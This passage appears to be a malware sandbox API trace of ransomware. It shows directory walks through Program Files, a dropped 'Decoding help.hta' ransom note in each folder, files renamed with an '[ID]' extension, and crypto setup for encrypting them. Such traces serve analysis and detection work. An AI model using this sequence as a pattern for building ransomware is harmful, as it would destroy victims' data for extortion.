Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0058.057] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 63 [0058.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" [0058.057] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\decoding help.hta")) returned 0x1 [0058.057] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0058.057] lstrlenW (lpString="icon.png") returned 8 [0058.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0058.057] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 63 [0058.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" [0058.057] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" [0058.057] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.057] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x1dadfd30 | out: lpFindFileData=0x1dadfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8052fafa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8052fafa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0058.057] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0058.057] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0058.057] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0058.058] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0058.058] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 63 [0058.058] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images" [0058.058] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0058.058] GlobalMemoryStatus (in: lpBuffer=0x1dadfd10 | out: lpBuffer=0x1dadfd10) [0058.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9478660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2b4 [0058.058] CloseHandle (hObject=0x2b4) returned 1 [0058.058] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x1dadfd30 | out: lpFindFileData=0x1dadfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8765739d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8765739d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x372d03b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0058.059] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0058.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 63 [0058.059] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" [0058.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\decoding help.hta")) returned 0x1 [0058.059] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0058.059] lstrlenW (lpString="logo.png") returned 8 [0058.059] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0058.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 63 [0058.059] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" [0058.059] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" [0058.059] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.059] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0x1dadfd30 | out: lpFindFileData=0x1dadfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8765739d, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8765739d, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x372d03b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0058.059] FindClose (in: hFindFile=0x5d7f10 | out: hFindFile=0x5d7f10) returned 1 Thread: id = 452 os_tid = 0x6bc [0045.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*", lpFindFileData=0x1dc1fd30 | out: lpFindFileData=0x1dc1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3270 [0045.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.530] FindNextFileW (in: hFindFile=0x5e3270, lpFindFileData=0x1dc1fd30 | out: lpFindFileData=0x1dc1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.732] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.732] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.732] FindNextFileW (in: hFindFile=0x5e3270, lpFindFileData=0x1dc1fd30 | out: lpFindFileData=0x1dc1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0048.732] lstrcmpW (lpString1=".", lpString2="10.0") returned -1 [0048.733] lstrcmpW (lpString1="..", lpString2="10.0") returned -1 [0048.733] lstrcmpiW (lpString1="windows", lpString2="10.0") returned 1 [0048.735] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*" [0048.735] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*") returned 59 [0048.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\", lpString2="10.0" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0" [0048.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*" [0048.735] GlobalMemoryStatus (in: lpBuffer=0x1dc1fd10 | out: lpBuffer=0x1dc1fd10) [0048.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x248c5a88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a0 [0048.743] CloseHandle (hObject=0x5a0) returned 1 [0048.743] FindNextFileW (in: hFindFile=0x5e3270, lpFindFileData=0x1dc1fd30 | out: lpFindFileData=0x1dc1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2d148, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0048.743] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*" [0048.743] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*") returned 59 [0048.743] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\Decoding help.hta" [0048.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\decoding help.hta")) returned 0xffffffff [0048.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614 [0050.386] WriteFile (in: hFile=0x614, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1dc1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1dc1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.544] CloseHandle (hObject=0x614) returned 1 [0053.667] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.627] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vstoee.dll") returned -1 [0057.627] lstrlenW (lpString="vstoee.dll") returned 10 [0057.627] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*" [0057.627] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\*.*") returned 59 [0057.627] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\", lpString2="vstoee.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" [0057.627] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" [0057.627] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.598] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x49c [0061.599] CreateFileMappingA (hFile=0x49c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5d4 [0061.599] CryptAcquireContextA (phProv=0x1dc1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 453 os_tid = 0x8f4 [0045.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*", lpFindFileData=0x1dd5fd30 | out: lpFindFileData=0x1dd5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a60b0 [0045.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.446] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x1dd5fd30 | out: lpFindFileData=0x1dd5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.446] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.446] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.446] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x1dd5fd30 | out: lpFindFileData=0x1dd5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0045.446] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0045.446] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0045.446] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0048.535] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*" [0048.535] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*") returned 66 [0048.535] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033" [0048.535] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*.*" [0048.535] GlobalMemoryStatus (in: lpBuffer=0x1dd5fd10 | out: lpBuffer=0x1dd5fd10) [0048.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109a08e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.536] CloseHandle (hObject=0x5a4) returned 1 [0048.536] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x1dd5fd30 | out: lpFindFileData=0x1dd5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdd9f300, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbdd9f300, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xaf88, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOSV.DLL", cAlternateFileName="")) returned 1 [0048.536] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*" [0048.536] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*") returned 66 [0048.536] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\Decoding help.hta" [0048.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\decoding help.hta")) returned 0xffffffff [0048.536] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x750 [0050.925] WriteFile (in: hFile=0x750, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1dd5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1dd5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.645] CloseHandle (hObject=0x750) returned 1 [0052.157] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.696] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSOSV.DLL") returned -1 [0056.696] lstrlenW (lpString="MSOSV.DLL") returned 9 [0056.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*" [0056.696] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\*.*") returned 66 [0056.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\", lpString2="MSOSV.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" [0056.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" [0056.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0056.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll.[id]g9uzrlhjaygpwrm1[id]"), 